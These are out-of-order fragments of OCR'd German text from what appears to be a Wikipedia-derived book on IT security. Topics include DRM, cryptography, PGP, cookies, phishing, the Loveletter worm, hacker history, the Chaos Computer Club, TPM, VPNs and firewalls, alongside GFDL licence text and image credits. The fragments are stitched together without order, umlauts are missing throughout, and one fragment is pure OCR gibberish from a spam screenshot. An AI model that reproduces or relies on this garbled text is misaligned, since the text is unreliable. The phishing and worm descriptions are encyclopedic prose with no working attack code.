68. Sicherheit geht alle an Tagungsband zum 9 Deutschen IT Sicherheitskongress des BSI ISBN 3 922746 99 3 Picot A Thielmann Heinz Distribution und Schutz digitaler Medien durch Digital Rights Management ISBN 3 540 23844 1 nl Vural Content Protection Economic analysis and techno legal implementation ISBN 3 8316 0462 2 Quelle http de wikipedia org wiki Digital_Rights_Management Historie 8 3 03 Angelegt von Kku danach bearbeitet von den Hauptautoren Prussio Harold1977 Fgb Keimzelle AndSi Priwo Kku Mistral MauriceKA Volty SebastianBreier Steven Malkovich Geframuc Kubieziel Canubis Chrisfrenzel Zaphiro Stefan184 Achim Raschka IP X Daboss RobotE Head Andilar Nfsa GFJ Wuffel Faraway Velten anonym 12 1 06 1 2 06 WikiPress Redaktion 132 PGP und Zertfikate Platform for Privacy Preferences Die Abkiirzung P3P steht fiir Platform for Privacy Preferences Dabei han delt es sich um eine technische Plattform zum Austausch von Daten schutzinformationen Dieser Standard ist vom WWW Consortium W3C anerkannt P3P soll dem Surfer im Internet helfen mittels standardisierter Tech nik schnell einen Uberblick zu erhalten was mit den personenbezoge nen Daten geschieht die beim Besuch einer Website anfallen Durch die Standardisierung ist es dabei m glich auch Datenschutzerkl rungen von fremdsprachigen Internetseiten zu interpretieren Der Internetsurfer kann P3P kostenlos nutzen Dazu ben tigt m
69. Steve Burnett Stephen Kryptographie RSA Security s Official Guide 1 Auflage RSA Press Bonn 2001 ISBN 3 8266 0780 5 Singh Simon Codes dtv M nchen 2002 ISBN 3 423 62167 2 Auszug aus Geheime Botschaften Singh Simon Geheime Botschaften 4 Auflage dtv M nchen 2001 ISBN 3 423 33071 6 Schneier Bruce Applied Cryptography Second Edition John Wiley amp Sons 1996 ISBN 0 471 11709 9 Wobst Reinhard Abenteuer Kryptologie 3 Auflage Addison Wesley M nchen 2003 ISBN 3 8273 1815 7 Quelle http de wikipedia org wiki Asymmetrisches_Kryptosystem gek rzt Historie 20 5 03 Angelegt von Vanis danach bearbeitet von den Hauptautoren Gmoeller Vanis Wolley Stern MlaWU Wernfried Rat DreamFlasher Robbot Meph666 Wiegels LetsGetLauth Warp Steven Malkovich W ewert Achim Raschka Priwo Leonardo Chrisfrenzel FutureCrash Eldred Zwobot Kurt seebauer Magnus Rdb anonym 12 1 06 1 2 06 WikiPress Redaktion Verschl sselung Verschl sselung nennt man den Vorgang bei dem ein Klartext mit Hilfe eines Verschl sselungsverfahrens Algorithmus in einen Geheim text umgewandelt wird Als Parameter des Verschl sselungsverfahrens werden ein oder mehrere Schl ssel verwendet Das Forschungsgebiet das sich mit der Verschl sselung und ihrer Geschichte besch ftigt wird als Kryptografie bezeichnet Den umgekehrten Vorgang also die Verwandlung des Geheimtextes zur ck in den Klartext nennt man En
70. The Document may contain zero Invariant Sections If the Document does not identify any Invariant Sections then there are none The Cover Texts are certain short passages of text that are listed as Front Cover Texts or Back Cover Texts in the notice that says that the Document is released under this License A Front Cover Text may be at most 5 words and a Back Cover Text may be at most 25 words A Transparent copy of the Document means a machine readable copy represented in a format whose specification is available to the general public that is suitable for revising the document straightforwardly with generic text editors or for images composed of pixels generic paint programs or for drawings some widely available drawing editor and that is suitable for input to text formatters or for automatic translation to a variety of formats suitable for input to text formatters A copy made in an otherwise Transparent file format whose markup or absence of markup has been arranged to thwart or discourage subsequent modification by readers is not Transparent An image format is not Transparent if used for any substantial amount of text A copy that is not Transparent is called Opaque Examples of suitable formats for Transparent copies include plain ASCII without markup Texinfo input format LaTeX input format SGML or XML using a publicly available DTD and standard conforming simple HTML PostScript or PDF designed for human modification Examp
71. Version 1 2 November 2002 into German It is not published by the Free Software Foundation and does not legally state the distribution terms for documentation that uses the GNU FDL only the original English text of the GNU FDL does that However we hope that this translation will help German speakers understand the GNU FDL better 0 PRAAMBEL Der Zweck dieser Lizenz ist es ein Handbuch ein Textbuch oder ein anderes niitzliches Dokument freizugeben im Sinne von Freiheit und jedem die tats chliche Freiheit zu gew hren es sowohl kommerziell als auch nicht kommerziell mit oder ohne nderungen zu vervielf ltigen und zu verbreiten Weiterhin erm glicht diese Lizenz dem Autor oder Herausgeber Anerkennung f r seine Arbeit zu bekommen ohne zugleich f r nderungen durch andere verantwortlich gemacht werden zu k nnen Diese Lizenz ist eine Art copyleft das hei t dass Bearbeitungen dieses Dokuments ihrerseits in derselben Weise frei sein m ssen Sie vervollst ndigt die GNU General Public License die eine copyleft Lizenz f r freie Software ist Diese Lizenz war urspr nglich f r Handb cher ber freie Software gedacht denn freie Software braucht eine freie Dokumentation Zu einem freien Programm sollte es Handb cher geben die dieselben Freiheiten bieten die auch die Software selbst bietet Diese Lizenz ist aber nicht auf Handb cher f r Software beschr nkt sondern kann auf jede Art von Text angewandt werden unabh ngi
72. WLANPCMCIA L jpg Da 336 Abb 25 GFDL Quelle http de wikipedia org wiki Bild RC4_grob JPG J rg Hedrich Abb 26 GFDL Quelle http de wikipedia org Abb 27 GFDL Quelle http de wikipedia org wiki Bild WEP_Dekodierung JPG J rg Hedrich Abb 28 GFDL Quelle http de wikipedia org wiki Bild WEP PNG Djoser Abb 29 GFDL Quelle http de wikipedia org wiki Bild Verschl sselung_ symmetrisches_ Kryptosystem png Stern Abb 30 GFDL Quelle http de wikipedia org wiki Bild Entschl sselung_ symmetrisches_ und_asymmetrisches_ Kryptosystem png Stern Abb 31 GFDL Quelle http de wikipedia org wiki Bild Verschl sselung_ asymmetrisches_ Kryptosystem png Stern Abb 32 Freigegeben Quelle http de wikipedia org wiki Bild Enigma logo jpg NSA Abb 33 GFDL Quelle http de wikipedia org wiki Bild Enigma_Verkehrshaus_Luzern jpg JochenF Abb 34 GFDL Quelle http de wikipedia org wiki Bild Enigma rotor stack jpg Bob Lord Abb 35 Freigegeben Quelle http de wikipedia org wiki Bild Enigma wiringdiagram png Jeanot Abb 36 GFDL Quelle http de wikipedia org wiki Bild Enigma plugboard jpg Bob Lord Abb 37 GFDL Quelle http de wikipedia org wiki Bild Enigma_rotor_set png Wapcaplet wiki Bild WEP_Kodierung JPG J rg Hedrich Index A Access Point 244 ActiveX 90 92 96 109 Ad hoc Netzwerk 239 Adams CarlisleM 277 Address Resolution Pr
73. Wert sowie mehreren be n tigten oder optionalen Attributen mit oder ohne Wert Einige Attribute sowie deren Einschlie en in Hochkommas werden empfohlen Name Beliebiger Name und Wert aus ASCII Zeichen die vom Server berge ben werden Version Gibt die Cookie Management Spezifikation in einer Dezimalzahl an Expires Ablaufdatum Zeitpunkt der automatischen L schung in GMT f r HTTP 1 0 Max age Ablaufzeit in Sekunden 0 f r L schung bei HTTP 1 1 166 HTTP Cookie Domain Domain oder Bestandteil des Domainnamens f r den der Cookie gilt Path G ltigkeits Pfad Teil der Anfrage URI um die G ltigkeit des Cookies auf einen bestimmten Pfad zu beschranken Port Beschr nkung des Ports auf den aktuell verwendeten oder auf eine Lis te von Ports Comment Kommentar zur naheren Beschreibung des Cookies CommentURL URL unter welcher eine Beschreibung zur Funktionsweise zu finden ist Secure R cksendung des Cookies ber eine mindestens ebenso sichere Verbin dung ohne zugeh rigen Wert Discard Unbedingte L schung des Cookies bei Beendigung des User Agents Funktionsweise ein Beispiel Cookies werden durch den Webserver im HTTP Header mit der Angabe Set Cookie bearbeitet Der Cookie f ngt mit dem Namen und den zu speichernden Daten an und kann da nach mehrere Angaben zur Verwendung beinhalten Set Cookie letzteSuche cookie aufbau expires Tue 29 Mar 2005 19 30 42 GMT Max Age 2592000 Path cgi suche py Version
74. auffordert Folgt er dieser Aufforderung gelangen seine Zugangsdaten in die H nde der Urheber der Phishing Attacke Was dann folgt soll nur noch nachtr gliches Misstrauen des Opfers zerstreuen Eine kurze Best tigung oder eine falsche Fehlermeldung 230 Phishing Eine andere Variante bindet ein Formular direkt innerhalb einer HTML E Mail ein das zur Eingabe der vertraulichen Daten auffordert und die se an die Urheber sendet Auf eine Phishing Website wird hierbei ver zichtet Methoden der Verschleierung E Mail Die E Mail wird als HTML E Mail eine E Mail mit den gra fischen M glichkeiten von Webseiten verfasst Der Linktext zeigt die Originaladresse an w hrend das unsichtbare Linkziel auf die Adresse der gef lschten Website verweist Mit der Einbindung von HTML kann der im Mail Programm sichtbare Link tats chlich auf eine ganz andere Webseite verweisen Zwar l sst sich ersehen dass das Linkziel auf eine andere Webseite verweist Allerdings k nnen auch diese Angaben ber Skripttechniken verf lscht werden In anderen F llen wird der Link als Grafik dargestellt Auf dem Bildschirm des Anwenders erscheint zwar Text dieser ist allerdings eine Grafik Hierf r wird meistens auch die E Mail Adresse des Absenders ge f lscht Website Die gef lschten Zielseiten haben meistens gef lschte Namen oder Bezeichnungen die hnlich klingen wie die offiziellen Seiten oder Firmen Die Zielseiten mit dem Webformular haben das g
75. bezogen auch skurrile meist auf die Schnel le erstellte Notl sungen als Hack bezeichnet die zwar funktionieren aber bei weitem nicht perfekt sind In Bezug auf einen Entwickler dessen Quellcode eine einzige Aneinanderreihung solcher Hacks darstellt steht das Wort Hacker f r einen schlampigen Programmierer und stellt keine Ehrung dar 1983 wurde der Begriff Hacker erstmals im Zusammenhang mit kri minellen Computerfachleuten durch die Medien Newsweek und ber CBS News propagiert Mitte der 1980er standen Hacker vornehmlich f r wissbegierige Men schen welche die Welt der Computer erforschten dabei in die Tiefen der Materie eindrangen und sich dadurch auch in fremde Systeme hacken konnten Fasziniert von diesen F higkeiten wurde Letzteres vor allem ge 176 Hacker gen Ende der 1980er durch Film und Presse stark bertrieben dargestellt Eine recht begrenzte Definition des Begriffs erreichte so die K pfe der Be v lkerung und lie den Mythos Hacker wie er heute sprachgebr uchlich verwendet wird entstehen Der 1988 erschienene Beitrag Stalking the Wily Hacker von Clifford Stoll aus der Mai Ausgabe des Communications of the ACM sowie sein ma gebliches Werk The Cuckoo s Egg aus dem Jahr 1989 und nicht zuletzt die Reaktionen der Presse auf den zu dieser Zeit kursie renden Morris Wurm und den KGB Hack taten ihr briges um dieses einseitige Bild nachhaltig zu pr gen Um dem schlechten Ruf des Hackers entgegenzuwirken v
76. by the Free Software Foundation with no Invariant Sections no Front Cover Texts and no Back Cover Texts A copy of the license is included in the section entitled GNU Free Documentation License If you have Invariant Sections Front Cover Texts and Back Cover Texts replace the with Texts line with this with the Invariant Sections being LIST THEIR TITLES with the Front Cover Texts being LIST and with the Back Cover Texts being LIST If you have Invariant Sections without Cover Texts or some other combination of the three merge those two alternatives to suit the situation If your document contains nontrivial examples of program code we recommend releasing these examples in parallel under your choice of free software license such as the GNU General Public License to permit their use in free software 330 GNU Free Documentation License Version 1 2 November 2002 deutsch Dies ist eine inoffizielle deutsche Ubersetzung der GNU Free Documentation License Version 1 2 November 2002 Sie wird nicht von der Free Software Foundation herausgegeben und erlautert auch nicht die rechtskraftigen Bedingungen fiir die Verbreitung von Werken die unter der GNU FDL stehen dies leistet nur die englischsprachige Originalversion der GNU FDL Dennoch hoffen wir dass diese Ubersetzung dazu beitragt deutschsprachigen Lesern das Verst ndnis der GNU FDL zu erleichtern This is an unofficial translation of the GNU Free Documentation License
77. cksendet Mit Cookies ist das zustandslose Hypertext Transfer Protocol um die M glichkeit erweitert Information zwischen Aufrufen zu speichern Dadurch erleichtern Cookies die Be nutzung von Webseiten die h ufig oder wiederholt Benutzereingaben erfordern Funktionsweise Cookies werden in den Header Teilen von HTTP Anfragen und Antwor ten bertragen Man kann zwischen persistenten Cookies und Session Cookies unter scheiden Erstere werden ber einen festgelegten Zeitraum auf der Fest platte gespeichert beispielsweise zwei Tage oder drei Monate w hrend letztere nur f r die L nge einer Sitzung gespeichert werden 164 HTTP Cookie Wenn der Webserver einer Website Cookies zu einem Browser sendet HTTP Antwort werden sie lokal auf dem Endger t gespeichert auf Computern blicherweise in einer Textdatei Dort sucht der Browser bei jedem Aufruf einer Webseite nach Cookies die von der selben Website stammen und f gt diese Cookies dem Aufruf HTTP Anfrage hinzu Damit ist eine best ndige Verbindung zwischen Browser und Server ge w hrleistet der Server erkennt den Browser wieder Ein Cookie kann beliebigen Text enthalten seine L nge sollte jedoch 4 KiB nicht ber schreiten um mit allen Browsern kompatibel zu bleiben Mit jeder ber mittelten Datei also z B auch mit Bilddateien kann ein Server nur einen Cookie versenden mit einer Anfrage des Browsers k nnen gleichzeitig mehrere Cookies versandt werden Dieses
78. das Reverse Engineering von Software sowie das Ver ndern von mangelhaft gesch tztem Softwarecode zum Hackerhand werk um vermeintliche Sicherheitsbarrieren eines Systems zu berwinden Je nach Einsatzzweck machen sich also auch Hacker diese Technik zunutze weshalb eine Trennung der Begriffe derzeit schwerer f llt als damals 173 Sonstige Themen Zu jener Zeit kam es zu gro en Debatten ber White Hats Gray Hats Black Hats und zahlreiche weitere Themen hinsichtlich der Ethik der Hacker Offensichtlich brauchten die Menschen einen Begriff welcher die guten von den b sen Hackern unterscheidet Nun waren Cracker schon damals Computerfreaks die in den meisten F llen kriminelle Handlun gen vollzogen haben Das erscheint logisch denn einen Kopierschutz oder dergleichen zu umgehen ist nur selten legal Seit Mitte der 1980er entwi ckelte sich daraus das missverst ndliche Bild dass alle b sen Hacker Cracker sind obwohl sie wie oben bereits geschrieben nicht wirklich viel mit Hackern oder besser Crashern gemein hatten Zum rger der Soft warecracker erhielt so der Begriff Cracker nach und nach eine zweite voll kommen neue Bedeutung die bis heute parallel zum Begriff des Software crackers existiert Aus unerfindlichen Gr nden blieb hingegen der Begriff Crasher in der ffentlichkeit weitgehend ohne Beachtung Der Entwicklung folgend wurde im Jargonfile der Hacker Community dann erstmals 1990 ein Hinweis hinterlegt welche
79. das TPM hingegen aktiviert dann wird beim Aktivieren jeder weiteren relevanten Komponente festgelegte Hard und Software ein Hashwert gebildet Wurden alle Komponenten aktiviert wird ein Hashwert ber die Gesamtkonfiguration gebildet und in einem sicheren Bereich des 125 Software TPM abgelegt Danach wird der normale Hochfahrvorgang fortgesetzt Der gewonnene Hashwert wird beispielsweise vom TPM f r das Sealing eingesetzt Ein aktiver Eingriff des Systems wie ein Verhindern des Start vorgangs oder ein Ausschalten des Rechners sind von der Spezifikation nicht vorgesehen Verf gbare Hardware IBM Notebooks werden bereits seit Anfang 2003 mit TPM Chips ausge liefert Im Dezember 2003 stellte Intel die erste Hauptplatine D865GRH mit TPM vor Intel geht die aktuelle Spezifikation nicht weit genug deshalb wird dort an einem eigenen Konzept namens LaGrande gearbeitet das auch Mic rosofts eigentliche Zielplattform werden soll LaGrande sollte ab dem 2 Quartal 2005 auf den Markt kommen Es ist inzwischen nicht mehr f r Server CPUs wie den Itanium sondern nur noch f r Client Systeme vor gesehen AMD hat im November 2004 angek ndigt in die n chste Prozessor generation ab 2006 die Technik Presidio zu integrieren die als Security Architecture bezeichnet wird Kritik Wie aus den einf hrenden Abschnitten hervorgeht haben die zertifizie renden Stellen eine Sonderposition die ihnen exklusiv erlaubt Software als zertifiz
80. de wikipedia org wiki Dialer Historie 22 2 03 Anonym angelegt danach bearbeitet von den Hauptautoren Der Jurist Andre Riemann Schoopr Pkn MichaelDiederich Alkibiades Head Steven Malkovich Achim Raschka Freibeuter Andrsvoss Paddy Masterchief Emi Nerd BWBot Rolf Weirauch Aka EKKi Qualle Dominik Hadhuey Hermannthomas Kdwnv Haeber Napa JCS Stw anonym 12 1 06 1 2 06 WikiPress Redaktion Palladium Palladium ist eine Software fiir das Betriebssystem Windows der Firma Microsoft f r TCPA TCG Die Software kann dazu dienen E Mails zu verifizieren unterschrei ben beglaubigen und sch tzenswerte Inhalte aufzubewahren Au erdem lassen sich mit Palladium E Mails versenden die sich nach einer Woche aufl sen oder nicht ausdrucken lassen Bei E Books und Video sind hn liche Einschr nkungen denkbar Zudem kann damit Software fest an Hardware gebunden werden was aber auch ohne Palladium m glich ist Nicht vertrauensw rdige Anwendungen werden blockiert Unsichere und sichere Anwendungen sollen in verschiedenen Speicherbereichen ar beiten Laut Microsoft hat Palladium mit DRM nichts zu tun was aber nicht sachlich belegbar ist setzt entgegen fr heren Informationen jedoch auf die Spezifikation der TCPA TCG auf Die Zertifizierung f r Palladium soll nur optional und nicht wie fr her angegeben zwingend notwendig sein Palladium l uft nicht auf aktueller Anfang 2003 Hardware Den Mit telpunkt der So
81. dem Gesetz zur nderung des Bundesdatenschutzgeset zes und anderer Gesetze in nationales Recht umgesetzt Geregelt wird auch die bermittlung von personenbezogenen Daten in Drittstaaten die nicht Mitglied der EU sind Gem Artikel 25 ist die bermittlung nur dann zu l ssig wenn der Drittstaat ein angemessenes Schutzniveau gew hrleistet Die Entscheidung welche L nder dieses Schutzniveau gew hrleisten wird von der Kommission getroffen die dabei von der so genannten Artikel 29 Datenschutzgruppe beraten wird Aktuell Stand 9 2004 wird gem Ent scheidung der Kommission von folgenden Drittstaaten ein angemessenes Schutzniveau gew hrleistet Schweiz Kanada Argentinien Guernsey Insel Man sowie bei der Anwendung der vom US Handelsministerium vorgeleg ten Grunds tze des sicheren Hafens und bei der bermittlung von Flug gastdatens tzen an die US Zoll und Grenzschutzbeh rde CBP Insbesondere die Entscheidung ber die Zul ssigkeit der bermitt lung von Fluggastdatens tzen an die US amerikanischen Zollbeh rden ist stark umstritten gewesen So hat das Europ ische Parlament gegen diese Entscheidungen der Kommission und des Rates Klage erhoben da es sei ner Ansicht nach unzureichend beteiligt worden sei und zudem seitens der USA kein angemessenes Datenschutzniveau garantiert werde Erg nzt wurde diese Richtlinie durch die bereichsspezifische Richtli nie 2002 58 EG ber die Verarbeitung personenbezogener Daten un
82. die ersten n Bits des Datenstroms invertiert werden Ein Startwert ungleich 0000 ist vorzuziehen da fehlende Bits inner halb f hrender Nullen im Datenstrom sonst nicht erkannt werden eben so wie bei einer gew hnlichen Division z hlen bei einer Polynomdivision f hrende Nullen nicht Nachbearbeitung Ein weiteres Problem ist das Nullproblem Wird der Datenstrom aus irgendeinem Grund einschlie lich der CRC gleich Null so werden Fehler im Empf nger im Standardalgorithmus nicht mehr er kannt auch wenn Startwerte ungleich Null verwendet werden Eine Null folge ergibt bei der Polynomdivison stets den Wert Null Wird das CRC Ergebnis invertiert kann man das Nullproblem effektiv vermeiden da eine Folge von Nullen dann das Ergebnis 1111 erzeugt Die bekannte CRC 32 verwendet sowohl 1111 als Startwert als auch ein inverses Ergebnis Bei CRC 16 wird ebenfalls meist 1111 verwendet das Ergebnis jedoch nicht invertiert Erkannte Fehler Ist das CRC Polynom gut gew hlt k nnen mit dem oben beschriebenen Verfahren alle Einbit und Zweibitfehler jede ungerade Anzahl von ver f lschten Bits sowie alle B ndelfehler der L nge lt r erkannt werden wo bei r der Grad des CRC Polynoms ist Zus tzlich werden alle Fehler also auch unabh ngige Vierbit Sechsbit Achtbitfehler u s w erkannt de ren Polynomdarstellung einen kleineren Grad als das CRC Polynom hat Warum das so ist bzw wie das CRC Polynom zu w hlen ist fol
83. die gesamte Technik zu ber blicken Durch weitere Neuentwicklungen dieser Technik steigert sich die Komplexit t von Tag zu Tag Beispiele aus der Praxis Ein Jugendlicher wendet sich mit einem Problem an eine Onlinebera tungsstelle per herk mmlicher E Mail Es geht um Probleme mit der eigenen Familie der Vater ist gewaltt tig Der Jugendliche hat einen eigenen Mailaccount des Zugangsproviders Der Vater besitzt jedoch das Masterpasswort und l sst sich alle Mails in Kopie zusenden Beim Surfen gelangt ein Trojaner auf den privaten PC eines Internet nutzers Dieser hat weder Antivirensoftware installiert noch wird der PC regelm ig mit einem anderen Programm untersucht das Spywa re erkennen kann Dieser PC kann nun aus der Ferne komplett ber wacht und sogar ferngesteuert werden Es gibt im Netz sogar Tools die automatisch nach solchen trojanerinfizierten PCs suchen Eine Frau kommuniziert per E Mail mit ihrem Scheidungsanwalt Ihr Ex Mann hat sich Zugriff auf die Zugangsdaten des Mail Accounts verschafft Dieser kennt nun im Voraus jeden geplanten Schritt der Ehefrau und wei um die m glichen Konsequenzen seines Verhaltens Weder die Ehefrau noch deren Anw ltin ahnen dass der Prozessgegner genau informiert ist Ein Mitarbeiter hat Probleme mit seinem Vorgesetzten ber den Dienstaccount wendet er sich an eine Beratungseinrichtung zum The ma Mobbing Der Vorgesetzte l sst sich die E Mails ber den Adminis trator der F
84. die unangefordert an eine gro e Anzahl von Empf ngern verschickt werden Unsolicited Commercial E mail kurz Comeme Mad casses mussen gt gt Beten 1 900 26199 Coes itari Select AB None Fond Umeed Stamed Unctared pe Note Spam messages more than 20 APy3 ofd wi be autormancaby deletes zent Mant TO Rebecca Thompson Your acoum OVI P 129m Outs F Aanmtreng Angeline FREE PlayStation 2 or PlayStation Portable el s FODE x sem AM D Parim Hab Your account 73 T829 a baam Weah I John Annmarie Aishi movie downloads te keep you company Pian a Wendy Bertin Microset Pro sch un Sabe Macromedia N Sates 22am Comtesse PF Connie Frye Youve bees approved at 3 25 a ttam vui F Pet Kemtertiyates com Application appiuwal ter atqueningtigmall com Sat 05 Mas 2905 68 17 10 0000 Mus w Thre Glenn ReCantlimunen Link d e us i packte en Become one of the low 3 25 rates f r Mad PF deme Champagne m mus career D Tyson Bowen Confirmation Link Toe en oa Mai Grech Bote Crome your awn DVO compilation READ HERE Mus uw om PD Gone Get your PSP RIGHT WOW for WOTHING 277 R Portal Mui mn ne F joseph issan dient sotona Mus Fo Wen Thomsontexcte c soge senner dgmail com Your Application Confimaten Twa Mas ZU 16 34 30 4000 us 7 Dela Dwyer FREE PlayStation 2 or PlayStaten Portable fa FRE h Mui 7 Frankin Dukes Re finssce at 3 25 Sred si s Muj I Reb Huggins You ve been selected for a low rate Mu Do
85. diese Datei danach von einem anderen Computer aus ausgef hrt wurde wurde dieser PC ebenfalls infiziert Zu guter Letzt konnte er sich ber das IRC Netz per DCC verbreiten Dazu durchsuchte er die Festplatte nach dem IRC Client mIRC und ber schrieb die Datei script ini Sie enth lt ein Skript das Loveletter beim Betreten eines Channels an alle dort anwesenden Personen schicken soll Der Autor versuchte normale Anwender vom L schen des Skriptes ab zuhalten indem er die Datei mit einer gef hrlich klingenden Warnung beginnen lie script mIRC Script Please dont edit this script mIRC will corrupt if mIRC will corrupt WINDOWS will affect and will not run correct ly thanks bersetzt inklusive Grammatikfehler Bitte bearbeiten Sie dieses Skript nicht mIRC wird besch digt wenn mIRC besch digt wird wird WINDOWS betroffen und nicht mehr korrekt funktionieren danke Schadensroutine Der Wurm l schte auf infizierten Rechnern alle Dateien mit den Dateien dungen jpg jpeg vbs vbe js jse css wsh sct und hta und legte eine gleichnamige Kopie von sich selbst mit der Dateiendung vbs an Au er 63 Viren W rmer Trojaner dem wurden alle Dateien mit den Endungen mp2 und mp3 als versteckt markiert und wiederum eine gleichnamige Kopie des Wurms mit der En dung vbs angelegt Auf Grund seiner exponentiellen Verbreitung hat er in den ersten Stun den viele Mailserver berlastet Die folgen
86. direkt verbunden sein Die Verbindung ber das ffentliche Netz wird blicherweise verschl sselt Der Begriff Private impliziert jedoch nicht wie vielfach angenommen dass es sich um eine verschl sselte bertragung handelt Eine Verbindung der Netze wird ber einen Tunnel zwischen VPN Client und VPN Server erm glicht Meist wird der Tunnel dabei gesichert aber auch ein ungesicherter Klartexttunnel ist ein VPN IP VPNs nutzen das Internet zum Transport von IP Paketen unab h ngig vom bertragungsnetz was im Gegensatz zum direkten Remote Zugriff auf ein internes Netz direkte Einwahl beispielsweise ber ISDN GSM wesentlich flexibler und kosteng nstiger ist Anwendungen VPNs werden oft verwendet um Mitarbeitern au erhalb einer Organi sation oder Firma Zugriff auf das interne Netz zu geben Dabei baut der Computer des Mitarbeiters eine VPN Verbindung zu dem ihm bekannten VPN Gateway der Firma auf ber diese Verbindung ist es dem Mitarbei ter nun m glich so zu arbeiten als ob er im lokalen Netz der Firma w re Remote Access VPN Dieses Verfahren wird auch verwendet um Wire less LANs und andere Funkstrecken zu sichern End to Site VPN Sollen zwei lokale Netze verbunden werden wird auf beiden Seiten ein VPN Gateway verwendet Diese bauen dann untereinander eine VPN Verbindung auf Andere Rechner in einem lokalen Netz verwenden nun den Gateway auf ihrer Seite um Daten in das andere Netz zu senden So lassen sich
87. ei nem bestimmten Thema bieten Der traditionelle CC CeBIT Award wird jedes Jahr zur Computermesse CeBIT in Hannover ver Abb 13 Zelt auf dem Chaos Communication Camp mit liehen Pesth rnchen Flagge 158 Chaos Computer Club Publikationen Der CCC gibt vier Mal j hrlich die Zeitschrift Die Datenschleuder das wissenschaftliche Fachblatt f r Datenreisende heraus Zus tzlich ist in den 1980er Jahren in zwei Ausgaben die Hackerbibel erschienen ein umfangreiches Kompendium und Sammelsurium mit zahlreichen Doku menten der Hackerszene Die Hackerbibeln und alle Ausgaben der Da tenschleuder bis zum Jahr 2000 sind digitalisiert und auf der Chaos CD erh ltlich Au erdem wird seit dem 21 Chaos Communication Congress ein Tagungsband verfasst und ver ffentlicht Des Weiteren wird auf dem Radiosender Fritz aus Berlin einmal im Monat die Sendung Chaosradio ausgestrahlt Weitere Radiosendungen des CCC sind C RaDaR aus Darmstadt dev radio aus Ulm Radio Cha otica aus Karlsruhe und Nerds on Air aus Wien Geschichte Gr ndung Gegr ndet wurde der CCC am 12 September 1981 in Berlin am Tisch der Kommune 1 in den Redaktionsr umen der taz Jedoch ent wickelte sich der Club in den folgenden Jahren haupts chlich in Hamburg da sich die Gr ndungsmitglieder Wau Holland und Tom Twiddlebit dort aufhielten Anfang 1984 wurde die erste Ausgabe der Datenschleuder ver ffentlicht In die Anfangszeit f llt auch die Ver ffentlichung des Ba
88. ei nen Paketfilter handelt der mit dem Benutzer interagiert Einige Regulars der Newsgroup de comp security firewall m chten auch die Funktions vielfalt mancher Produkte in der Definition verankert sehen H ufig geben Hersteller ihrer Paketfiltersoftware oder deren Konfi gurationstools den Namen Firewall Beispiele daf r sind die Windows Firewall die SuSEfirewall oder die IPFirewall ipfw von FreeBSD In Handb chern von Personal Firewalls und Computerzeitschriften wer den die Bezeichnungen Firewall und Personal Firewall h ufig synonym eingesetzt Bei Heimanwendern haben sich die Begriffe Hardware Fire wall und Software Firewall eingeb rgert Hardware Firewall bezeichnet ein externes Ger t Software Firewall ist ein Synonym f r Personal Fire wall Viele Netzadministratoren lehnen diese Bezeichnungen ab Auch auf einem externen Router l uft Software Statt zwischen Hard und Softwa re Firewall sollte man daher zwischen Routern mit Paketfilterfunktion und hostbasierten Paketfiltern HBPF unterscheiden Alle der oben ge nannten Produkte w rden nach Meinung vieler Netzadministratoren nicht der Bezeichnung Firewall gerecht Eine Firewall sei ein sorgf l tig geplantes und st ndig gewartetes System zur Trennung von Netzbe reichen Eine Firewall ist ein Konzept und keine Software die man sich einfach installieren kann Die Umsetzung eines solchen Firewallkonzepts die physische Firewall ist standortspezifisch und bes
89. eine dadurch fehlende Debattierm glichkeit Kritik von Datensch tzern Datensch tzer sowie linke und liberale Parteien protestierten entschieden und stellten den Sinn einer solchen Ma nahme zur Debatte sie weise den Weg Richtung berwachungsstaat Wenn man sich nicht sicher sein k n ne frei kommunizieren zu k nnen leide darunter die Zivilgesellschaft B rger w rden vor politischen u erungen im Internet zur ckschrecken Anonyme Seelsorge und Beratungsdienste seien ebenso gef hrdet Eine Ausweitung ber den Kampf gegen den Terror hinaus auf minderschwere Delikte sei zu bef rchten wie etwa das Beispiel der Diskussionen um den genetischen Fingerabdruck gezeigt habe Quelle http de wikipedia org wiki Vorratsdatenspeicherung Historie 17 2 05 Anonym angelegt danach bearbeitet von den Hauptautoren Forevermore StYxXx Daniel Moser Nikolaus Asleif Jacob koehler Eldred anonym 12 1 06 1 2 06 WikiPress Redaktion Chaos Computer Club Der Chaos Computer Club CCC ist ein deutscher Verein von und f r Hacker Wichtigste Ziele des Clubs sind Informationsfreiheit und ein Menschenrecht auf Kommunikation Die Mitgliedschaft steht jedem offen der sich mit diesen Zielen identifizieren kann Obwohl die Hacker 157 Sonstige Themen sich gerne als galaktische Gemeinschaft sehen die nicht auf Verwal tungsakte angewiesen sein will gibt es einen eingetragenen Verein mit ca 4000 Mitgliedern Der CCC wurde gegr
90. einen Empf nger werden mit seinem ffentlichen Schl ssel kodiert und k nnen dann nur durch den privaten Schl ssel des Empf ngers ge ffnet werden Diese Verfahren werden auch asymmetrische Verfahren genannt da Sen der und Empf nger zwei unterschiedliche Schl ssel verwenden Die erste Version wurde 1991 geschrieben und verwendete einen RSA Algorithmus zur Verschl sselung der Daten Sp tere Versionen benutzten den DH DSS Algorithmus Bei PGP wird aber nicht die ganze Nachricht asymmetrisch verschl s selt denn dies w re viel zu rechenintensiv Stattdessen wird die eigentliche Nachricht symmetrisch und nur der verwendete Schl ssel asymmetrisch 134 Pretty Good Privacy verschl sselt Hybride Verschl sselung Dazu wird jedes Mal ein symme trischer Schl ssel zuf llig erzeugt Dieser symmetrische Schl ssel wird dann per RSA oder Elgamal Kryptosystem mit dem ffentlichen Schl ssel des Empf ngers verschl s selt und der Nachricht hinzugef gt Dadurch ist es m glich eine Nachricht f r mehrere Empf nger gleichzeitig zu verschl sseln Eine f r mehrere Empf nger verschl sselte Nachricht sieht dann folgenderma en aus asymmetrisch verschl sselter Schl ssel der Nachricht f r Empf nger 1 eventuell weitere asymmetrisch verschl sselte Schl ssel asymmetrisch verschl sselter Schl ssel der Nachricht f r Empf nger n symmetrisch verschl sselte Nachricht PGP basiert dabei auf dem Web of Trust bei dem e
